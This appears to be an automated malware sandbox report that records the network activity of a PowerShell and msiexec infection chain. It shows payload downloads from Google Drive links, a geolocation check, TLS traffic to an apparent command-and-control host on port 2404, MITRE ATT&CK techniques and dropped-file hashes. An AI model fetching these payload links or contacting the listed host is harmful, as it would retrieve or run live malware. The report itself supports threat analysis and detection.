X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 415268
Last-Modified: Mon, 09 Dec 2024 23:08:55 GMT
X-GUploader-UploadID: AFiumC7y8O8-l_uGsadPqi_e9TuqB67Upy2P8grM59ik1x_lqseFZbS-eA4nAcOzpjC0XwGvuA
Date: Tue, 10 Dec 2024 01:10:27 GMT
Expires: Tue, 10 Dec 2024 01:10:27 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=/1eLCA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

78.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.169.217.172.in-addr.arpa

IN PTR

Response

78.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f141e100net
DNS

225.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.212.58.216.in-addr.arpa

IN PTR

Response

225.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f11e100net

225.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f1�H

225.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f225�H
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
GET

https://drive.google.com/uc?export=download&id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ

msiexec.exe

Remote address:

172.217.169.78:443

Request

GET /uc?export=download&id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 10 Dec 2024 01:10:52 GMT
Location: https://drive.usercontent.google.com/download?id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-3OkL1iTCgM583Xp0pogRiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

c.pki.goog

msiexec.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://c.pki.goog/r/r1.crl

msiexec.exe

Remote address:

142.250.178.3:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 10 Dec 2024 00:52:47 GMT
Expires: Tue, 10 Dec 2024 01:42:47 GMT
Cache-Control: public, max-age=3000
Age: 1085
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

o.pki.goog

msiexec.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D

msiexec.exe

Remote address:

142.250.178.3:80

Request

GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Tue, 10 Dec 2024 00:11:49 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 3543
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

msiexec.exe

Remote address:

142.250.178.3:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Tue, 10 Dec 2024 00:35:32 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2120
GET

https://drive.usercontent.google.com/download?id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ&export=download

msiexec.exe

Remote address:

216.58.212.225:443

Request

GET /download?id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

X-GUploader-UploadID: AFiumC7AonoNp9YSzE4Mzz0coRMEHH7lPePEJTrFHA_AeVlhZFC8-n8xx557HxwlEQD3QnRi
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="mwFNvCzDM217.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 494656
Last-Modified: Mon, 09 Dec 2024 23:07:30 GMT
Date: Tue, 10 Dec 2024 01:10:55 GMT
Expires: Tue, 10 Dec 2024 01:10:55 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=UCwCqA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

212.20.149.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.20.149.52.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

geoplugin.net

msiexec.exe

Remote address:

8.8.8.8:53

Request

geoplugin.net

IN A

Response

geoplugin.net

IN A

178.237.33.50
GET

http://geoplugin.net/json.gp

msiexec.exe

Remote address:

178.237.33.50:80

Request

GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Tue, 10 Dec 2024 01:10:57 GMT
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

214.18.216.154.in-addr.arpa

Remote address:

8.8.8.8:53

Request

214.18.216.154.in-addr.arpa

IN PTR

Response
DNS

50.33.237.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.33.237.178.in-addr.arpa

IN PTR

Response

50.33.237.178.in-addr.arpa

IN CNAME

50.32/27.178.237.178.in-addr.arpa
DNS

133.130.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.130.81.91.in-addr.arpa

IN PTR

Response
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response

172.217.169.78:443

https://drive.google.com/uc?export=download&id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo

tls, http

powershell.exe

917 B
9.2kB
9
11

HTTP Request

GET https://drive.google.com/uc?export=download&id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo

HTTP Response

303
216.58.212.225:443

https://drive.usercontent.google.com/download?id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo&export=download

tls, http

powershell.exe

9.0kB
447.0kB
183
326

HTTP Request

GET https://drive.usercontent.google.com/download?id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo&export=download

HTTP Response

200
172.217.169.78:443

https://drive.google.com/uc?export=download&id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ

tls, http

msiexec.exe

1.2kB
9.2kB
15
12

HTTP Request

GET https://drive.google.com/uc?export=download&id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ

HTTP Response

303
142.250.178.3:80

http://c.pki.goog/r/r1.crl

http

msiexec.exe

395 B
1.8kB
6
5

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
142.250.178.3:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

http

msiexec.exe

830 B
1.6kB
8
5

HTTP Request

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

HTTP Response

200
216.58.212.225:443

https://drive.usercontent.google.com/download?id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ&export=download

tls, http

msiexec.exe

18.5kB
530.6kB
390
387

HTTP Request

GET https://drive.usercontent.google.com/download?id=16xOGNfRDwxIHbGbGjypWPLqG2UFTlFMQ&export=download

HTTP Response

200
154.216.18.214:2404

tls

msiexec.exe

3.2kB
1.6kB
13
15
154.216.18.214:2404

tls

msiexec.exe

38.8kB
512.3kB
268
381
178.237.33.50:80

http://geoplugin.net/json.gp

http

msiexec.exe

577 B
1.3kB
11
3

HTTP Request

GET http://geoplugin.net/json.gp

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

86.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

86.49.80.91.in-addr.arpa
8.8.8.8:53

71.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

71.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

drive.google.com

dns

msiexec.exe

62 B
78 B
1
1

DNS Request

drive.google.com

DNS Response

172.217.169.78
8.8.8.8:53

drive.usercontent.google.com

dns

msiexec.exe

74 B
90 B
1
1

DNS Request

drive.usercontent.google.com

DNS Response

216.58.212.225
8.8.8.8:53

78.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

78.169.217.172.in-addr.arpa
8.8.8.8:53

225.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

225.212.58.216.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

c.pki.goog

dns

msiexec.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.178.3
8.8.8.8:53

o.pki.goog

dns

msiexec.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

142.250.178.3
8.8.8.8:53

3.178.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.178.250.142.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

geoplugin.net

dns

msiexec.exe

59 B
75 B
1
1

DNS Request

geoplugin.net

DNS Response

178.237.33.50
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

214.18.216.154.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

214.18.216.154.in-addr.arpa
8.8.8.8:53

50.33.237.178.in-addr.arpa

dns

72 B
155 B
1
1

DNS Request

50.33.237.178.in-addr.arpa
8.8.8.8:53

133.130.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

133.130.81.91.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfmoeyx4.2vq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdhrujpyzlshhnpxkobcogoo

Filesize
4KB

MD5
f1d2c01ce674ad7d5bad04197c371fbc

SHA1
4bf0ed04d156a3dc6c8d27e134ecbda76d3585aa

SHA256
25b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094

SHA512
81cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77

Download Submit
C:\Users\Admin\AppData\Roaming\Elgtyre.Bev

Filesize
405KB

MD5
17ea5f6329fe062a0dbca4c04658c8d9

SHA1
68cd242dae3be4f4a2576be6ce1ec17230b4e04d

SHA256
8bfe6104cfdf979c2f9fddf4dda0b75cc5729de16826fe1f19d2730363e2e246

SHA512
0cc7f3c6c0abc74e9c0954b80def4ed380274c48cc3df5ffc4a4698318a6b322b2eb1d379060fde2d6ea6a0716822b543564ef2991888e22bf5200e217747648

Download Submit
memory/224-71-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/224-64-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/224-68-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/224-70-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/412-72-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/412-73-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/412-65-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1156-58-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-63-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-94-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-93-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-92-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-91-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-90-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-89-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-88-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-87-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-86-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-85-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-80-0x000000001FED0000-0x000000001FEE9000-memory.dmp

Filesize
100KB

Download
memory/1156-83-0x000000001FED0000-0x000000001FEE9000-memory.dmp

Filesize
100KB

Download
memory/1156-84-0x000000001FED0000-0x000000001FEE9000-memory.dmp

Filesize
100KB

Download
memory/2696-42-0x0000000007B20000-0x0000000007B42000-memory.dmp

Filesize
136KB

Download
memory/2696-39-0x0000000008180000-0x00000000087FA000-memory.dmp

Filesize
6.5MB

Download
memory/2696-25-0x0000000006240000-0x00000000062A6000-memory.dmp

Filesize
408KB

Download
memory/2696-35-0x00000000062E0000-0x0000000006634000-memory.dmp

Filesize
3.3MB

Download
memory/2696-23-0x0000000005A50000-0x0000000005A72000-memory.dmp

Filesize
136KB

Download
memory/2696-37-0x00000000068F0000-0x000000000690E000-memory.dmp

Filesize
120KB

Download
memory/2696-38-0x0000000006940000-0x000000000698C000-memory.dmp

Filesize
304KB

Download
memory/2696-21-0x0000000005340000-0x0000000005376000-memory.dmp

Filesize
216KB

Download
memory/2696-40-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

Filesize
104KB

Download
memory/2696-41-0x0000000007BC0000-0x0000000007C56000-memory.dmp

Filesize
600KB

Download
memory/2696-24-0x0000000006150000-0x00000000061B6000-memory.dmp

Filesize
408KB

Download
memory/2696-43-0x0000000008DB0000-0x0000000009354000-memory.dmp

Filesize
5.6MB

Download
memory/2696-22-0x0000000005B20000-0x0000000006148000-memory.dmp

Filesize
6.2MB

Download
memory/2696-45-0x0000000009360000-0x000000000AAE1000-memory.dmp

Filesize
23.5MB

Download
memory/4040-77-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4040-67-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4040-66-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4864-0-0x00007FF821C03000-0x00007FF821C05000-memory.dmp

Filesize
8KB

Download
memory/4864-6-0x00000132EDA70000-0x00000132EDA92000-memory.dmp

Filesize
136KB

Download
memory/4864-11-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download
memory/4864-12-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download
memory/4864-14-0x00007FF821C03000-0x00007FF821C05000-memory.dmp

Filesize
8KB

Download
